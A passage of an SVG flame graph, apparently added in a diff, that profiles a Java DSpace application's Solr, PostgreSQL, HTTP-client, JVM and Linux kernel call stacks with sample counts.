+<text  x="1131.32" y="271.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.45%)</title><rect x="240.6" y="709" width="5.4" height="15.0" fill="rgb(210,65,65)" rx="2" ry="2" />
+<text  x="243.64" y="719.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.23%)</title><rect x="956.7" y="389" width="2.7" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="959.68" y="399.5" ></text>
+</g>
+<g >
+<title>java/net/SocketOutputStream:::socketWrite0 (1 samples, 0.23%)</title><rect x="1055.9" y="309" width="2.7" height="15.0" fill="rgb(68,217,68)" rx="2" ry="2" />
+<text  x="1058.91" y="319.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Begin:::match (1 samples, 0.23%)</title><rect x="1053.2" y="437" width="2.7" height="15.0" fill="rgb(98,244,98)" rx="2" ry="2" />
+<text  x="1056.23" y="447.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/AbstractAutowireCapableBeanFactory:::predictBeanType (4 samples, 0.91%)</title><rect x="1005.0" y="389" width="10.7" height="15.0" fill="rgb(99,245,99)" rx="2" ry="2" />
+<text  x="1007.95" y="399.5" ></text>
+</g>
+<g >
+<title>[unknown] (29 samples, 6.59%)</title><rect x="63.6" y="805" width="77.8" height="15.0" fill="rgb(201,52,52)" rx="2" ry="2" />
+<text  x="66.64" y="815.5" >[unknown]</text>
+</g>
+<g >
+<title>schedule (4 samples, 0.91%)</title><rect x="130.7" y="693" width="10.7" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="133.68" y="703.5" ></text>
+</g>
+<g >
+<title>Java_java_net_SocketInputStream_socketRead0 (3 samples, 0.68%)</title><rect x="1141.7" y="341" width="8.1" height="15.0" fill="rgb(203,55,55)" rx="2" ry="2" />
+<text  x="1144.73" y="351.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (1 samples, 0.23%)</title><rect x="1155.1" y="325" width="2.7" height="15.0" fill="rgb(201,52,52)" rx="2" ry="2" />
+<text  x="1158.14" y="335.5" ></text>
+</g>
+<g >
+<title>java/security/AccessController:::doPrivileged (1 samples, 0.23%)</title><rect x="1123.0" y="389" width="2.6" height="15.0" fill="rgb(68,217,68)" rx="2" ry="2" />
+<text  x="1125.95" y="399.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="1144.4" y="117" width="2.7" height="15.0" fill="rgb(249,121,121)" rx="2" ry="2" />
+<text  x="1147.41" y="127.5" ></text>
+</g>
+<g >
+<title>Interpreter (1 samples, 0.23%)</title><rect x="1128.3" y="341" width="2.7" height="15.0" fill="rgb(223,84,84)" rx="2" ry="2" />
+<text  x="1131.32" y="351.5" ></text>
+</g>
+<g >
+<title>bbr_min_tso_segs (1 samples, 0.23%)</title><rect x="648.3" y="645" width="2.7" height="15.0" fill="rgb(200,50,50)" rx="2" ry="2" />
+<text  x="651.27" y="655.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.23%)</title><rect x="905.7" y="357" width="2.7" height="15.0" fill="rgb(52,201,52)" rx="2" ry="2" />
+<text  x="908.73" y="367.5" ></text>
+</g>
+<g >
+<title>futex_wait (4 samples, 0.91%)</title><rect x="299.6" y="725" width="10.8" height="15.0" fill="rgb(229,92,92)" rx="2" ry="2" />
+<text  x="302.64" y="735.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/HttpRequestExecutor:::postProcess (1 samples, 0.23%)</title><rect x="787.7" y="373" width="2.7" height="15.0" fill="rgb(94,240,94)" rx="2" ry="2" />
+<text  x="790.73" y="383.5" ></text>
+</g>
+<g >
+<title>__perf_event_task_sched_in (48 samples, 10.91%)</title><rect x="353.3" y="645" width="128.7" height="15.0" fill="rgb(200,50,50)" rx="2" ry="2" />
+<text  x="356.27" y="655.5" >__perf_event_tas..</text>
+</g>
+<g >
+<title>__x64_sys_futex (1 samples, 0.23%)</title><rect x="192.4" y="741" width="2.6" height="15.0" fill="rgb(229,92,92)" rx="2" ry="2" />
+<text  x="195.36" y="751.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$GroupTail:::match (2 samples, 0.45%)</title><rect x="978.1" y="165" width="5.4" height="15.0" fill="rgb(54,204,54)" rx="2" ry="2" />
+<text  x="981.14" y="175.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="948.6" y="261" width="2.7" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="951.64" y="271.5" ></text>
+</g>
+<g >
+<title>__schedule (8 samples, 1.82%)</title><rect x="219.2" y="677" width="21.4" height="15.0" fill="rgb(204,56,56)" rx="2" ry="2" />
+<text  x="222.18" y="687.5" >_..</text>
+</g>
+<g >
+<title>JNU_ThrowByName (1 samples, 0.23%)</title><rect x="1098.8" y="309" width="2.7" height="15.0" fill="rgb(227,89,89)" rx="2" ry="2" />
+<text  x="1101.82" y="319.5" ></text>
+</g>
+<g >
+<title>java/util/HashSet:::iterator (1 samples, 0.23%)</title><rect x="1042.5" y="357" width="2.7" height="15.0" fill="rgb(95,241,95)" rx="2" ry="2" />
+<text  x="1045.50" y="367.5" ></text>
+</g>
+<g >
+<title>nf_hook_slow (1 samples, 0.23%)</title><rect x="642.9" y="597" width="2.7" height="15.0" fill="rgb(212,68,68)" rx="2" ry="2" />
+<text  x="645.91" y="607.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="297.0" y="741" width="2.6" height="15.0" fill="rgb(220,79,79)" rx="2" ry="2" />
+<text  x="299.95" y="751.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (1 samples, 0.23%)</title><rect x="1055.9" y="373" width="2.7" height="15.0" fill="rgb(55,204,55)" rx="2" ry="2" />
+<text  x="1058.91" y="383.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/PGStream:::ReceiveTupleV3 (1 samples, 0.23%)</title><rect x="935.2" y="277" width="2.7" height="15.0" fill="rgb(60,209,60)" rx="2" ry="2" />
+<text  x="938.23" y="287.5" ></text>
+</g>
+<g >
+<title>org/apache/http/message/HeaderGroup:::getHeaders (1 samples, 0.23%)</title><rect x="1133.7" y="341" width="2.7" height="15.0" fill="rgb(53,203,53)" rx="2" ry="2" />
+<text  x="1136.68" y="351.5" ></text>
+</g>
+<g >
+<title>native_write_msr (8 samples, 1.82%)</title><rect x="219.2" y="613" width="21.4" height="15.0" fill="rgb(222,82,82)" rx="2" ry="2" />
+<text  x="222.18" y="623.5" >n..</text>
+</g>
+<g >
+<title>java/lang/Class:::forName (2 samples, 0.45%)</title><rect x="895.0" y="405" width="5.4" height="15.0" fill="rgb(87,234,87)" rx="2" ry="2" />
+<text  x="898.00" y="415.5" ></text>
+</g>
+<g >
+<title>__x86_indirect_thunk_rax (1 samples, 0.23%)</title><rect x="629.5" y="437" width="2.7" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="632.50" y="447.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.45%)</title><rect x="1184.6" y="709" width="5.4" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="1187.64" y="719.5" ></text>
+</g>
+<g >
+<title>Interpreter (1 samples, 0.23%)</title><rect x="1128.3" y="245" width="2.7" height="15.0" fill="rgb(203,55,55)" rx="2" ry="2" />
+<text  x="1131.32" y="255.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/request/RequestWriter$LazyContentStream:::getName (19 samples, 4.32%)</title><rect x="696.5" y="405" width="51.0" height="15.0" fill="rgb(107,252,107)" rx="2" ry="2" />
+<text  x="699.55" y="415.5" >org/a..</text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.45%)</title><rect x="240.6" y="773" width="5.4" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="243.64" y="783.5" ></text>
+</g>
+<g >
+<title>java/util/AbstractCollection:::addAll (1 samples, 0.23%)</title><rect x="833.3" y="373" width="2.7" height="15.0" fill="rgb(55,205,55)" rx="2" ry="2" />
+<text  x="836.32" y="383.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeWithFlags (1 samples, 0.23%)</title><rect x="798.5" y="341" width="2.6" height="15.0" fill="rgb(55,205,55)" rx="2" ry="2" />
+<text  x="801.45" y="351.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="908.4" y="389" width="2.7" height="15.0" fill="rgb(216,74,74)" rx="2" ry="2" />
+<text  x="911.41" y="399.5" ></text>
+</g>
+<g >
+<title>dequeue_task_fair (1 samples, 0.23%)</title><rect x="12.7" y="661" width="2.7" height="15.0" fill="rgb(217,75,75)" rx="2" ry="2" />
+<text  x="15.68" y="671.5" ></text>
+</g>
+<g >
+<title>perf_event_task_tick (1 samples, 0.23%)</title><rect x="755.5" y="261" width="2.7" height="15.0" fill="rgb(212,67,67)" rx="2" ry="2" />
+<text  x="758.55" y="271.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.23%)</title><rect x="1055.9" y="389" width="2.7" height="15.0" fill="rgb(57,206,57)" rx="2" ry="2" />
+<text  x="1058.91" y="399.5" ></text>
+</g>
+<g >
+<title>__intel_pmu_enable_all.constprop.0 (8 samples, 1.82%)</title><rect x="195.0" y="629" width="21.5" height="15.0" fill="rgb(222,83,83)" rx="2" ry="2" />
+<text  x="198.05" y="639.5" >_..</text>
+</g>
+<g >
+<title>preempt_count_sub (1 samples, 0.23%)</title><rect x="605.4" y="389" width="2.6" height="15.0" fill="rgb(202,53,53)" rx="2" ry="2" />
+<text  x="608.36" y="399.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultUserTokenHandler:::getUserToken (1 samples, 0.23%)</title><rect x="1136.4" y="389" width="2.6" height="15.0" fill="rgb(65,213,65)" rx="2" ry="2" />
+<text  x="1139.36" y="399.5" ></text>
+</g>
+<g >
+<title>sun/misc/FloatingDecimal$BinaryToASCIIBuffer:::appendTo (1 samples, 0.23%)</title><rect x="704.6" y="325" width="2.7" height="15.0" fill="rgb(72,220,72)" rx="2" ry="2" />
+<text  x="707.59" y="335.5" ></text>
+</g>
+<g >
+<title>netif_rx_internal (1 samples, 0.23%)</title><rect x="589.3" y="517" width="2.7" height="15.0" fill="rgb(246,117,117)" rx="2" ry="2" />
+<text  x="592.27" y="527.5" ></text>
+</g>
+<g >
+<title>__schedule (8 samples, 1.82%)</title><rect x="195.0" y="677" width="21.5" height="15.0" fill="rgb(222,83,83)" rx="2" ry="2" />
+<text  x="198.05" y="687.5" >_..</text>
+</g>
+<g >
+<title>org/dspace/servicemanager/config/DSpaceConfigurationService:::getProperty (1 samples, 0.23%)</title><rect x="1045.2" y="453" width="2.7" height="15.0" fill="rgb(55,204,55)" rx="2" ry="2" />
+<text  x="1048.18" y="463.5" ></text>
+</g>
+<g >
+<title>__poll (1 samples, 0.23%)</title><rect x="1101.5" y="309" width="2.7" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="1104.50" y="319.5" ></text>
+</g>
+<g >
+<title>tcp_rbtree_insert (1 samples, 0.23%)</title><rect x="651.0" y="645" width="2.6" height="15.0" fill="rgb(211,66,66)" rx="2" ry="2" />
+<text  x="653.95" y="655.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::hashCode (1 samples, 0.23%)</title><rect x="900.4" y="389" width="2.6" height="15.0" fill="rgb(90,236,90)" rx="2" ry="2" />
+<text  x="903.36" y="399.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::processResults (1 samples, 0.23%)</title><rect x="798.5" y="309" width="2.6" height="15.0" fill="rgb(87,234,87)" rx="2" ry="2" />
+<text  x="801.45" y="319.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.23%)</title><rect x="905.7" y="373" width="2.7" height="15.0" fill="rgb(60,209,60)" rx="2" ry="2" />
+<text  x="908.73" y="383.5" ></text>
+</g>
+<g >
+<title>preempt_count_sub.constprop.0 (1 samples, 0.23%)</title><rect x="342.5" y="677" width="2.7" height="15.0" fill="rgb(226,87,87)" rx="2" ry="2" />
+<text  x="345.55" y="687.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/PoolingDataSource:::getConnection (2 samples, 0.45%)</title><rect x="1168.5" y="453" width="5.4" height="15.0" fill="rgb(85,232,85)" rx="2" ry="2" />
+<text  x="1171.55" y="463.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/Bundle:::&lt;init&gt; (2 samples, 0.45%)</title><rect x="932.5" y="437" width="5.4" height="15.0" fill="rgb(109,254,109)" rx="2" ry="2" />
+<text  x="935.55" y="447.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$5:::isSatisfiedBy (2 samples, 0.45%)</title><rect x="978.1" y="69" width="5.4" height="15.0" fill="rgb(97,243,97)" rx="2" ry="2" />
+<text  x="981.14" y="79.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::find (1 samples, 0.23%)</title><rect x="932.5" y="405" width="2.7" height="15.0" fill="rgb(87,234,87)" rx="2" ry="2" />
+<text  x="935.55" y="415.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (4 samples, 0.91%)</title><rect x="1064.0" y="453" width="10.7" height="15.0" fill="rgb(89,236,89)" rx="2" ry="2" />
+<text  x="1066.95" y="463.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/logging/LogFactory:::getFactory (6 samples, 1.36%)</title><rect x="860.1" y="357" width="16.1" height="15.0" fill="rgb(68,216,68)" rx="2" ry="2" />
+<text  x="863.14" y="367.5" ></text>
+</g>
+<g >
+<title>org/dspace/core/Context:::cache (1 samples, 0.23%)</title><rect x="954.0" y="453" width="2.7" height="15.0" fill="rgb(94,240,94)" rx="2" ry="2" />
+<text  x="957.00" y="463.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/io/SocketInputBuffer:::isDataAvailable (3 samples, 0.68%)</title><rect x="779.7" y="373" width="8.0" height="15.0" fill="rgb(85,232,85)" rx="2" ry="2" />
+<text  x="782.68" y="383.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.23%)</title><rect x="905.7" y="389" width="2.7" height="15.0" fill="rgb(51,201,51)" rx="2" ry="2" />
+<text  x="908.73" y="399.5" ></text>
+</g>
+<g >
+<title>update_process_times (1 samples, 0.23%)</title><rect x="701.9" y="261" width="2.7" height="15.0" fill="rgb(253,127,127)" rx="2" ry="2" />
+<text  x="704.91" y="271.5" ></text>
+</g>
+<g >
+<title>org/dspace/browse/SolrBrowseCreateDAO:::&lt;init&gt; (6 samples, 1.36%)</title><rect x="978.1" y="341" width="16.1" height="15.0" fill="rgb(89,235,89)" rx="2" ry="2" />
+<text  x="981.14" y="351.5" ></text>
+</g>
+<g >
+<title>nft_do_chain (4 samples, 0.91%)</title><rect x="632.2" y="421" width="10.7" height="15.0" fill="rgb(215,72,72)" rx="2" ry="2" />
+<text  x="635.18" y="431.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/EntityEnclosingRequestWrapper$EntityWrapper:::writeTo (4 samples, 0.91%)</title><rect x="769.0" y="341" width="10.7" height="15.0" fill="rgb(57,206,57)" rx="2" ry="2" />
+<text  x="771.95" y="351.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Curly:::match0 (2 samples, 0.45%)</title><rect x="978.1" y="101" width="5.4" height="15.0" fill="rgb(82,229,82)" rx="2" ry="2" />
+<text  x="981.14" y="111.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingStatement:::close (1 samples, 0.23%)</title><rect x="943.3" y="357" width="2.7" height="15.0" fill="rgb(92,239,92)" rx="2" ry="2" />
+<text  x="946.27" y="367.5" ></text>
+</g>
+<g >
+<title>schedule (4 samples, 0.91%)</title><rect x="176.3" y="549" width="10.7" height="15.0" fill="rgb(250,123,123)" rx="2" ry="2" />
+<text  x="179.27" y="559.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.68%)</title><rect x="345.2" y="741" width="8.1" height="15.0" fill="rgb(227,89,89)" rx="2" ry="2" />
+<text  x="348.23" y="751.5" ></text>
+</g>
+<g >
+<title>futex_wait_queue_me (4 samples, 0.91%)</title><rect x="130.7" y="709" width="10.7" height="15.0" fill="rgb(254,129,129)" rx="2" ry="2" />
+<text  x="133.68" y="719.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.45%)</title><rect x="170.9" y="453" width="5.4" height="15.0" fill="rgb(249,121,121)" rx="2" ry="2" />
+<text  x="173.91" y="463.5" ></text>
+</g>
+<g >
+<title>Interpreter (1 samples, 0.23%)</title><rect x="1128.3" y="309" width="2.7" height="15.0" fill="rgb(247,119,119)" rx="2" ry="2" />
+<text  x="1131.32" y="319.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::socketRead0 (1 samples, 0.23%)</title><rect x="798.5" y="277" width="2.6" height="15.0" fill="rgb(73,221,73)" rx="2" ry="2" />
+<text  x="801.45" y="287.5" ></text>
+</g>
+<g >
+<title>start_thread (195 samples, 44.32%)</title><rect x="667.0" y="805" width="523.0" height="15.0" fill="rgb(227,90,90)" rx="2" ry="2" />
+<text  x="670.05" y="815.5" >start_thread</text>
+</g>
+<g >
+<title>loopback_xmit (2 samples, 0.45%)</title><rect x="586.6" y="549" width="5.4" height="15.0" fill="rgb(246,117,117)" rx="2" ry="2" />
+<text  x="589.59" y="559.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (4 samples, 0.91%)</title><rect x="836.0" y="325" width="10.7" height="15.0" fill="rgb(216,73,73)" rx="2" ry="2" />
+<text  x="839.00" y="335.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/common/util/JavaBinCodec:::readVal (1 samples, 0.23%)</title><rect x="1106.9" y="325" width="2.6" height="15.0" fill="rgb(103,248,103)" rx="2" ry="2" />
+<text  x="1109.86" y="335.5" ></text>
+</g>
+<g >
+<title>futex_wait (25 samples, 5.68%)</title><rect x="63.6" y="725" width="67.1" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="66.64" y="735.5" >futex_w..</text>
+</g>
+<g >
+<title>sun/reflect/GeneratedConstructorAccessor22:::newInstance (6 samples, 1.36%)</title><rect x="978.1" y="357" width="16.1" height="15.0" fill="rgb(101,247,101)" rx="2" ry="2" />
+<text  x="981.14" y="367.5" ></text>
+</g>
+<g >
+<title>__sys_sendto (39 samples, 8.86%)</title><rect x="559.8" y="741" width="104.6" height="15.0" fill="rgb(226,87,87)" rx="2" ry="2" />
+<text  x="562.77" y="751.5" >__sys_sendto</text>
+</g>
+<g >
+<title>enqueue_hrtimer (1 samples, 0.23%)</title><rect x="10.0" y="677" width="2.7" height="15.0" fill="rgb(209,63,63)" rx="2" ry="2" />
+<text  x="13.00" y="687.5" ></text>
+</g>
+<g >
+<title>schedule (8 samples, 1.82%)</title><rect x="195.0" y="693" width="21.5" height="15.0" fill="rgb(211,66,66)" rx="2" ry="2" />
+<text  x="198.05" y="703.5" >s..</text>
+</g>
+<g >
+<title>dequeue_entity (1 samples, 0.23%)</title><rect x="490.0" y="597" width="2.7" height="15.0" fill="rgb(205,58,58)" rx="2" ry="2" />
+<text  x="493.05" y="607.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (46 samples, 10.45%)</title><rect x="541.0" y="789" width="123.4" height="15.0" fill="rgb(225,86,86)" rx="2" ry="2" />
+<text  x="544.00" y="799.5" >entry_SYSCALL_64</text>
+</g>
+<g >
+<title>nft_do_chain (1 samples, 0.23%)</title><rect x="626.8" y="405" width="2.7" height="15.0" fill="rgb(235,102,102)" rx="2" ry="2" />
+<text  x="629.82" y="415.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/InputStreamEntity:::writeTo (4 samples, 0.91%)</title><rect x="769.0" y="325" width="10.7" height="15.0" fill="rgb(90,237,90)" rx="2" ry="2" />
+<text  x="771.95" y="335.5" ></text>
+</g>
+<g >
+<title>[[vdso]] (1 samples, 0.23%)</title><rect x="905.7" y="309" width="2.7" height="15.0" fill="rgb(233,98,98)" rx="2" ry="2" />
+<text  x="908.73" y="319.5" ></text>
+</g>
+<g >
+<title>__schedule (4 samples, 0.91%)</title><rect x="176.3" y="533" width="10.7" height="15.0" fill="rgb(252,125,125)" rx="2" ry="2" />
+<text  x="179.27" y="543.5" ></text>
+</g>
+<g >
+<title>__local_bh_enable_ip (1 samples, 0.23%)</title><rect x="562.5" y="693" width="2.6" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="565.45" y="703.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeWithFlags (1 samples, 0.23%)</title><rect x="935.2" y="325" width="2.7" height="15.0" fill="rgb(79,226,79)" rx="2" ry="2" />
+<text  x="938.23" y="335.5" ></text>
+</g>
+<g >
+<title>_complete_monitor_locking_Java (1 samples, 0.23%)</title><rect x="216.5" y="645" width="2.7" height="15.0" fill="rgb(215,73,73)" rx="2" ry="2" />
+<text  x="219.50" y="655.5" ></text>
+</g>
+<g >
+<title>copyin (1 samples, 0.23%)</title><rect x="653.6" y="661" width="2.7" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="656.64" y="671.5" ></text>
+</g>
+<g >
+<title>Java_java_net_SocketOutputStream_socketWrite0 (1 samples, 0.23%)</title><rect x="951.3" y="293" width="2.7" height="15.0" fill="rgb(200,50,50)" rx="2" ry="2" />
+<text  x="954.32" y="303.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern:::clazz (1 samples, 0.23%)</title><rect x="991.5" y="229" width="2.7" height="15.0" fill="rgb(97,243,97)" rx="2" ry="2" />
+<text  x="994.55" y="239.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/PGStream:::ReceiveTupleV3 (1 samples, 0.23%)</title><rect x="1072.0" y="325" width="2.7" height="15.0" fill="rgb(105,250,105)" rx="2" ry="2" />
+<text  x="1075.00" y="335.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/Category:::error (2 samples, 0.45%)</title><rect x="680.5" y="405" width="5.3" height="15.0" fill="rgb(93,239,93)" rx="2" ry="2" />
+<text  x="683.45" y="415.5" ></text>
+</g>
+<g >
+<title>wait_woken (19 samples, 4.32%)</title><rect x="487.4" y="677" width="50.9" height="15.0" fill="rgb(235,100,100)" rx="2" ry="2" />
+<text  x="490.36" y="687.5" >wait_..</text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::&lt;init&gt; (1 samples, 0.23%)</title><rect x="1117.6" y="405" width="2.7" height="15.0" fill="rgb(98,244,98)" rx="2" ry="2" />
+<text  x="1120.59" y="415.5" ></text>
+</g>
+<g >
+<title>blk_mq_complete_request (1 samples, 0.23%)</title><rect x="484.7" y="597" width="2.7" height="15.0" fill="rgb(214,70,70)" rx="2" ry="2" />
+<text  x="487.68" y="607.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="782.4" y="277" width="2.6" height="15.0" fill="rgb(224,85,85)" rx="2" ry="2" />
+<text  x="785.36" y="287.5" ></text>
+</g>
+<g >
+<title>iptable_security_hook (1 samples, 0.23%)</title><rect x="575.9" y="581" width="2.6" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="578.86" y="591.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (8 samples, 1.82%)</title><rect x="195.0" y="757" width="21.5" height="15.0" fill="rgb(248,120,120)" rx="2" ry="2" />
+<text  x="198.05" y="767.5" >d..</text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::processResults (2 samples, 0.45%)</title><rect x="1168.5" y="373" width="5.4" height="15.0" fill="rgb(50,200,50)" rx="2" ry="2" />
+<text  x="1171.55" y="383.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::socketRead0 (2 samples, 0.45%)</title><rect x="1098.8" y="341" width="5.4" height="15.0" fill="rgb(87,234,87)" rx="2" ry="2" />
+<text  x="1101.82" y="351.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/content/StringBody:::&lt;init&gt; (3 samples, 0.68%)</title><rect x="672.4" y="421" width="8.1" height="15.0" fill="rgb(94,240,94)" rx="2" ry="2" />
+<text  x="675.41" y="431.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::processResults (1 samples, 0.23%)</title><rect x="948.6" y="325" width="2.7" height="15.0" fill="rgb(93,240,93)" rx="2" ry="2" />
+<text  x="951.64" y="335.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/content/StringBody:::writeTo (1 samples, 0.23%)</title><rect x="691.2" y="325" width="2.7" height="15.0" fill="rgb(68,217,68)" rx="2" ry="2" />
+<text  x="694.18" y="335.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (6 samples, 1.36%)</title><rect x="1173.9" y="741" width="16.1" height="15.0" fill="rgb(247,119,119)" rx="2" ry="2" />
+<text  x="1176.91" y="751.5" ></text>
+</g>
+<g >
+<title>__schedule (19 samples, 4.32%)</title><rect x="487.4" y="629" width="50.9" height="15.0" fill="rgb(228,92,92)" rx="2" ry="2" />
+<text  x="490.36" y="639.5" >__sch..</text>
+</g>
+<g >
+<title>jbyte_disjoint_arraycopy (2 samples, 0.45%)</title><rect x="769.0" y="309" width="5.3" height="15.0" fill="rgb(208,62,62)" rx="2" ry="2" />
+<text  x="771.95" y="319.5" ></text>
+</g>
+<g >
+<title>pthread_cond_timedwait@@GLIBC_2.3.2 (1 samples, 0.23%)</title><rect x="192.4" y="789" width="2.6" height="15.0" fill="rgb(251,124,124)" rx="2" ry="2" />
+<text  x="195.36" y="799.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/helpers/AppenderAttachableImpl:::appendLoopOnAppenders (2 samples, 0.45%)</title><rect x="680.5" y="373" width="5.3" height="15.0" fill="rgb(89,236,89)" rx="2" ry="2" />
+<text  x="683.45" y="383.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (189 samples, 42.95%)</title><rect x="667.0" y="581" width="506.9" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="670.05" y="591.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>__schedule (48 samples, 10.91%)</title><rect x="353.3" y="677" width="128.7" height="15.0" fill="rgb(249,122,122)" rx="2" ry="2" />
+<text  x="356.27" y="687.5" >__schedule</text>
+</g>
+<g >
+<title>queue_work_on (1 samples, 0.23%)</title><rect x="484.7" y="549" width="2.7" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="487.68" y="559.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.45%)</title><rect x="868.2" y="293" width="5.3" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="871.18" y="303.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::processResults (1 samples, 0.23%)</title><rect x="956.7" y="309" width="2.7" height="15.0" fill="rgb(90,237,90)" rx="2" ry="2" />
+<text  x="959.68" y="319.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/common/util/JavaBinCodec:::readArray (1 samples, 0.23%)</title><rect x="1106.9" y="341" width="2.6" height="15.0" fill="rgb(51,201,51)" rx="2" ry="2" />
+<text  x="1109.86" y="351.5" ></text>
+</g>
+<g >
+<title>start_thread (1 samples, 0.23%)</title><rect x="61.0" y="805" width="2.6" height="15.0" fill="rgb(227,89,89)" rx="2" ry="2" />
+<text  x="63.95" y="815.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.68%)</title><rect x="168.2" y="565" width="8.1" height="15.0" fill="rgb(215,73,73)" rx="2" ry="2" />
+<text  x="171.23" y="575.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::processResults (1 samples, 0.23%)</title><rect x="935.2" y="293" width="2.7" height="15.0" fill="rgb(107,252,107)" rx="2" ry="2" />
+<text  x="938.23" y="303.5" ></text>
+</g>
+<g >
+<title>Interpreter (1 samples, 0.23%)</title><rect x="1128.3" y="357" width="2.7" height="15.0" fill="rgb(217,75,75)" rx="2" ry="2" />
+<text  x="1131.32" y="367.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/AbstractAutowireCapableBeanFactory:::instantiateBean (7 samples, 1.59%)</title><rect x="975.5" y="373" width="18.7" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="978.45" y="383.5" ></text>
+</g>
+<g >
+<title>tcp_v4_do_rcv (6 samples, 1.36%)</title><rect x="608.0" y="405" width="16.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="611.05" y="415.5" ></text>
+</g>
+<g >
+<title>JNU_ThrowByName (1 samples, 0.23%)</title><rect x="782.4" y="309" width="2.6" height="15.0" fill="rgb(223,84,84)" rx="2" ry="2" />
+<text  x="785.36" y="319.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (8 samples, 1.82%)</title><rect x="165.5" y="613" width="21.5" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
